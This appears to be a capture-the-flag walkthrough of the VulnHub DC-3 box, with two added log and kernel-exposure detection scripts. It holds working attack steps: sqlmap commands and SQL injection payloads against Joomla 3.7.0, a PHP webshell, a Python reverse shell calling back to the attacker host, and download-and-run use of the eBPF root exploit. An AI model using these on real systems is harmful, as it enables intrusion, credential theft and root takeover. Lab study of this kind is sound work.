DC-3 Box Penetration Test

Box: https://www.vulnhub.com/entry/dc-32,312/
Difficulty: low
Goal: obtain root privileges and the flag.

DC-3 is a penetration testing box published on VulnHub, intended for practising web application security and penetration testing skills. Its distinctive feature is that only port 80 is open, serving Apache and the Joomla CMS, which makes it suitable for beginners to practise the basics: information gathering, vulnerability scanning and privilege escalation.

Environment setup

Obtain the DC-3 image (e.g. DC-3.zip) from the VulnHub site or a mirror, unpack it and import it into VMware alongside the Kali attacking machine.
Put the target and the attacking machine on the same NAT or bridged network so that they share one LAN segment.
Scan the target's IP range with nmap (e.g. 192.168.96.128/24) to determine the target's real IP (e.g. 192.168.96.131) and the attacker's IP (e.g. 192.168.96.128).

Penetration steps

Information gathering
Run a full nmap port and service scan of the target, confirm that port 80 is open and identify the Apache/Joomla environment.
Open the target IP in a browser (e.g. http://192.168.96.131) and note any hints on the home page.

Vulnerability scanning and exploitation
Install JoomScan (available from the Kali package manager) and run a Joomla-specific scan to find the admin path (e.g. /administrator/).
Use nikto to scan for web vulnerabilities and misconfigurations.

Privilege escalation
Try weak credentials on the admin panel, or a known Joomla vulnerability (component bugs, misconfigurations), to gain administrator access.
If there is no direct way in, fall back to the usual techniques: file upload, SQL injection and so on.

Notes
The box is deliberately simple and tests basic skills; combine tools (nmap, JoomScan, nikto) rather than working purely by hand.
To make it harder, ignore the hints or try a different attack path.
Related reading: https://developer.aliyun.com/article/1362873

Information gathering

Host discovery

1. Check the local subnet

ifconfig

192.168.65.132
The attacking machine is on the 192.168.65.0 segment.

2. Host discovery

nmap -sn 192.168.65.0/24

└─# nmap -sn 192.168.65.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:17 EDT
Nmap scan report for 192.168.65.1
Host is up (0.00020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:FA:BF:D8 (VMware)
Nmap scan report for 192.168.65.147
Host is up (0.00017s latency).
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.0049s latency).
MAC Address: 00:50:56:F5:D2:FC (VMware)
Nmap scan report for 192.168.65.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.40 seconds

Knowing which addresses belong to our own setup (192.168.65.132 and the VMware host addresses), the remaining host must be the target:

192.168.65.147

3. Port scan

nmap -sT --min-rate 10000 -p- 192.168.65.147

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:19 EDT
Nmap scan report for 192.168.65.147
Host is up (0.0017s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds

TCP service scan

nmap -sT -sV -sC -O -p80 192.168.65.147

└─# nmap -sT -sV -sC -O -p80 192.168.65.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:31 EDT
Nmap scan report for 192.168.65.147
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds

Analysis

Host status
IP: 192.168.65.147
Status: up, latency 0.42 ms
MAC: 00:0C:29:4E:5A:03 (VMware virtual machine)

Port/service
80/tcp open
Service: http
Software: Apache httpd 2.4.18 (Ubuntu)
CMS: Joomla! (open source content management system)
Page title: Home
Server header: Apache/2.4.18 (Ubuntu)

OS fingerprint
OS: Linux 3.x - 4.x (most likely Ubuntu 16.04 with kernel 4.4)

Network
Distance: 1 hop (same segment)

Next steps
Web: the Joomla 3.x default admin path is /administrator; scan for vulnerabilities with joomscan or joomla-cves.
Directory brute force: run gobuster/dirb against http://192.168.65.147/ to find backups, config files and upload points.
Getting a shell: if the Joomla version is <= 3.4.6, try the CVE-2015-8562 deserialization bug; if <= 3.7.0, try the CVE-2017-8917 SQL injection.

UDP scan

nmap -sU --top-ports 20 192.168.65.147

Nmap script scan

nmap --script=vuln -p80 192.168.65.147
Nothing found.

Web penetration

Open the site in a browser.

There are no obvious leads, so we try the directory brute force mentioned earlier.

Directory brute force

dirsearch -u http://192.168.65.147

We find

/administrator/

Check for known vulnerabilities

Start with joomscan.

1. JoomScan is an open-source vulnerability scanner dedicated to the Joomla CMS.

On Kali it installs directly:

sudo apt update && sudo apt install joomscan

Basic usage

# Basic scan
joomscan -u http://192.168.65.147
# Also brute-force enumerate components
joomscan -u http://192.168.65.147 --enumerate-components
# Scan through a proxy
joomscan -u http://192.168.65.147 --proxy http://127.0.0.1:8080

The scan reveals the Joomla version (3.7.0).

Look up exploits

searchsploit Joomla 3.7.0

There is a SQL injection; copy the exploit text over and read it.

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt .
└─# cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)

Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

Use sqlmap to attempt the injection:

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

It reports a database named joomladb. List its tables:

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

Then go straight for the user table and list its columns:

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

Dump the username and password:

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump

+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

Crack the hash.

Password recovered:

snoopy

Reverse shell

Create a new file in the Protostar template

and put a one-line PHP webshell in it:

<?php system($_GET['cmd']);?>

Request it at

/templates/protostar/shell.php?cmd=id

Check whether python3 is available:

which python3

It returns a path.

Build the reverse shell:

python3 -c 'import socket,subprocess,os,pty;s=socket.socket();s.connect(("192.168.65.132",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

The shell connects back.
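Both the list[fullordering] injection and the shell.php?cmd=id requests above leave a distinctive trace in the Apache access log. The detector below is an added example, not code from the original post: it parses combined-format log lines (the sample lines are constructed) and flags list[fullordering] values that are not a plain column name plus ASC/DESC, as well as PHP files requested under /templates/ with a query string.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format; only the client IP, request target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Joomla's list[fullordering] legitimately carries a column name and a direction,
# e.g. "a.title ASC"; in 3.7.0 the raw value reached the query, so anything else is suspect.
ORDERING_OK = re.compile(r"^[A-Za-z0-9_.]+(?:\s+(?:asc|desc))?$", re.IGNORECASE)
# Template directories hold CSS/JS/images; a .php file requested there with a
# query string matches the shell.php?cmd=id pattern used in the write-up.
TEMPLATE_PHP = re.compile(r"^/templates/.+\.php$", re.IGNORECASE)

def inspect_request(target):
    """Return the reasons a request target looks malicious (empty list if clean)."""
    reasons = []
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes keys and values
    for value in params.get("list[fullordering]", []):
        if not ORDERING_OK.match(value.strip()):
            reasons.append(f"list[fullordering] is not a column/direction: {value!r}")
    if TEMPLATE_PHP.match(parts.path) and parts.query:
        reasons.append(f"PHP under /templates/ called with a query string: {parts.path}")
    return reasons

def scan_log(lines):
    """Return (client ip, status, reason) for every suspicious request line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for reason in inspect_request(m["target"]):
            findings.append((m["ip"], int(m["status"]), reason))
    return findings

# Constructed sample: three attacker requests matching the write-up and one benign
# admin listing that also uses list[fullordering].
SAMPLE_LOG = [
    '192.168.65.132 - - [17/Oct/2025:03:45:12 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 1234 "-" "Mozilla/5.0"',
    '192.168.65.132 - - [17/Oct/2025:03:45:13 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GDiu%29 HTTP/1.1" 200 5678 "-" "sqlmap/1.8"',
    '192.168.65.10 - - [17/Oct/2025:03:50:00 -0400] "GET /administrator/index.php?option=com_content&view=articles&list[fullordering]=a.title%20ASC HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '192.168.65.132 - - [17/Oct/2025:04:02:31 -0400] "GET /templates/protostar/shell.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {reason}")
```

The benign admin request from 192.168.65.10 is not flagged; the three attacker lines are.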

Privilege escalation

Check the system version:

www-data@DC-3:/var/www/html/templates/protostar$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@DC-3:/var/www/html/templates/protostar$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial

Check for known vulnerabilities

searchsploit Ubuntu 16.04

linux/local/39772.txt

Copy the file over and read it:

cp /usr/share/exploitdb/exploits/linux/local/39772.txt .
cat 39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

    /* look for pseudo eBPF instructions that access map FDs and
     * replace them with actual map pointers
     */
    static int replace_map_fd_with_map_ptr(struct verifier_env *env)
    {
        struct bpf_insn *insn = env->prog->insnsi;
        int insn_cnt = env->prog->len;
        int i, j;

        for (i = 0; i < insn_cnt; i++, insn++) {
            [checks for bad instructions]

            if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
                struct bpf_map *map;
                struct fd f;

                [checks for bad instructions]

                f = fdget(insn->imm);
                map = __bpf_map_get(f);
                if (IS_ERR(map)) {
                    verbose("fd %d is not pointing to valid bpf_map\n",
                            insn->imm);
                    fdput(f);
                    return PTR_ERR(map);
                }

                [...]
            }
        }
        [...]
    }

__bpf_map_get contains the following code:

    /* if error is returned, fd is released.
     * On success caller should complete fd access with matching fdput()
     */
    struct bpf_map *__bpf_map_get(struct fd f)
    {
        if (!f.file)
            return ERR_PTR(-EBADF);
        if (f.file->f_op != &bpf_map_fops) {
            fdput(f);
            return ERR_PTR(-EINVAL);
        }

        return f.file->private_data;
    }

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.

One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.

An exploit that puts all this together is in exploit.tar.

Usage:

    user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
    user@host:~/ebpf_mapfd_doubleput$ ./doubleput
    starting writev
    woohoo, got pointer reuse
    writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
    suid file detected, launching rootshell...
    we have root privs now...
    root@host:~/ebpf_mapfd_doubleput# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7

Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

Download the archive on Kali:

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

Serve it from the Kali machine:
python -m http.server 80

Fetch it on the target, then unpack the zip and the tarball inside it:
wget http://192.168.65.132/39772.zip
unzip 39772.zip
tar -xf exploit.tar

Exploitation

The usage is already given in the .txt file:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput

Upgrade to an interactive shell

python -c "import pty;pty.spawn('/bin/bash')"

Root obtained.
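The 39772 advisory quoted above names the three preconditions the exploit needs (kernel >= 4.4, CONFIG_BPF_SYSCALL set, and kernel.unprivileged_bpf_disabled not set to 1), and those are exactly the knobs a defender checks on a host like DC-3. The script below is an added example, not from the post or Exploit-DB: it evaluates those conditions from uname -r, the sysctl file and the kernel config, and reports only whether unprivileged bpf() is reachable, not whether this particular bug has been patched (that comes from the distro's kernel updates).

```python
import gzip
import os
import re
from pathlib import Path

def parse_release(release):
    """'4.4.0-21-generic' -> (4, 4, 0); only the leading numeric part matters."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(g or 0) for g in m.groups())

def bpf_exposure(release, unprivileged_bpf_disabled, bpf_syscall=True):
    """Evaluate the advisory's three preconditions; return (exposed, reasons).

    unprivileged_bpf_disabled: integer sysctl value, or None if the knob is absent.
    Any non-zero value disables unprivileged bpf() (1 permanently, 2 until an
    admin re-enables it). bpf_syscall: whether CONFIG_BPF_SYSCALL=y. The verdict
    covers the unprivileged bpf() attack surface, not the patch status of this bug.
    """
    reasons = []
    if parse_release(release) < (4, 4, 0):
        reasons.append(f"kernel {release} predates 4.4 (no unprivileged bpf())")
    if not bpf_syscall:
        reasons.append("CONFIG_BPF_SYSCALL is not set")
    if unprivileged_bpf_disabled is None:
        reasons.append("kernel.unprivileged_bpf_disabled sysctl is absent")
    elif unprivileged_bpf_disabled != 0:
        reasons.append(f"kernel.unprivileged_bpf_disabled={unprivileged_bpf_disabled}")
    return (not reasons, reasons)

def live_check():
    """Gather the three values from the running Linux host and evaluate them."""
    release = os.uname().release
    knob = Path("/proc/sys/kernel/unprivileged_bpf_disabled")
    value = int(knob.read_text().strip()) if knob.exists() else None
    config = Path(f"/boot/config-{release}")
    if config.exists():
        text = config.read_text()
    elif Path("/proc/config.gz").exists():
        with gzip.open("/proc/config.gz", "rt") as f:
            text = f.read()
    else:
        text = "CONFIG_BPF_SYSCALL=y"  # config unreadable: assume the worst case
    return bpf_exposure(release, value, "CONFIG_BPF_SYSCALL=y" in text)

if __name__ == "__main__":
    exposed, reasons = live_check()
    print("EXPOSED: set kernel.unprivileged_bpf_disabled=1" if exposed else "; ".join(reasons))
```

On DC-3 itself (4.4.0-21-generic, sysctl left at 0) the verdict is exposed; setting the sysctl to 1 is the runtime mitigation the advisory itself points at.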
